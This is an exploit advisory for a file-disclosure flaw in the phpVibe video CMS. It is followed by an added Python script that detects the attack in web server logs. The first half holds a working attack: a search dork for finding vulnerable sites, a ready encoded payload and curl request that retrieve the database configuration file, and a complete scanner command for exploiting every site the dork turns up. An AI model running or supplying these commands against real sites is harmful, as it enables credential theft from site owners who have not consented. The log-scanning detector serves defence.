Local file disclosure (LFD) vulnerability in phpVibe
PHPVibe - A PHP video script built for sharing video and media. PHPVibe video sharing CMS: PHP video embed and video upload script, ffmpeg video conversion, Youtube, Vine
# Exploit Title: phpVibe ALL versions LFD vulnerability
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions
# Tested on: linux
http://0day.today/exploit/23877
Vulnerable file:
stream.php
POC:
http://target.tld/stream.php?file=../vibe_config.php@@media
http://target.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09
Code:
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));
The file parameter is neither validated nor sanitized!
Exploitation is performed by appending "@@media" to the file name and base64-encoding the result twice, as shown below (no registration needed).
A single simple request gives access to the MySQL database configuration file.
Example:
curl 'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'
Using inurlbr scanner for mass exploitation:
Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command
SET DORK:
--dork '"powered by phpvibe"'
SET OUTPUT FILE:
-s telefone.txt
SET EXPLOIT GET:
--exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'
SET FILTER:
Filter results to unique domains.
--unique
SET VALIDATION:
Validate results based on the returned HTTP code.
Example: --ifcode {ifcode}
Usage: --ifcode 200
COMPLETE COMMAND:
php inurlbr.php --dork '"powered by phpvibe"' -s telefone.txt --exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09' --unique --ifcode 200
Solution:
Improve validation of the parameters passed to the application.
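
Detection side of the same issue, as an added example that is not part of the original advisory or of phpVibe: it reads web server access logs, reverses the double base64 on the stream.php file parameter, and reports tokens that point outside a media store. Assumptions: combined-format log lines, a token layout of <path>@@<type>, the extension deny-list, and all function names; the log lines are constructed.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_token(value):
    """Undo the double base64 applied to ?file=; None if it does not decode."""
    try:
        inner = base64.b64decode(value.replace(" ", "+"), validate=True)
        return base64.b64decode(inner, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def suspicious_reason(token):
    """Say why a token points outside the media store, or return None."""
    path = token.split("@@", 1)[0].replace("\\", "/")  # assumed: <path>@@<type>
    if ".." in path.split("/"):
        return "directory traversal"
    if path.startswith("/") or re.match(r"[A-Za-z]:", path):
        return "absolute path"
    if path.lower().endswith((".php", ".inc", ".ini")):  # assumed deny-list
        return "non-media file type"
    return None

def scan(lines):
    """Yield (line_no, token, reason) for suspicious stream.php requests."""
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not url.path.endswith("/stream.php"):
            continue
        for raw in parse_qs(url.query).get("file", []):
            token = decode_token(raw) or raw  # fall back to the raw value
            reason = suspicious_reason(token)
            if reason:
                yield line_no, token, reason

# Constructed sample data: a benign token and log lines with documentation IPs.
BENIGN = base64.b64encode(base64.b64encode(b"clip01.mp4@@media")).decode()
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Jul/2015:10:01:00 +0000] "GET /stream.php?file=%s HTTP/1.1" 200 52113' % BENIGN,
    '203.0.113.9 - - [13/Jul/2015:10:02:00 +0000] "GET /stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09 HTTP/1.1" 200 1840',
    '203.0.113.9 - - [13/Jul/2015:10:02:05 +0000] "GET /stream.php?file=../vibe_config.php@@media HTTP/1.1" 200 0',
    '198.51.100.7 - - [13/Jul/2015:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 911',
]

if __name__ == "__main__":
    print(list(scan(SAMPLE_LOG)))
```

Python's strict decoding rejects input that PHP's lenient base64_decode would still accept, so values that fail to decode are checked in raw form rather than skipped.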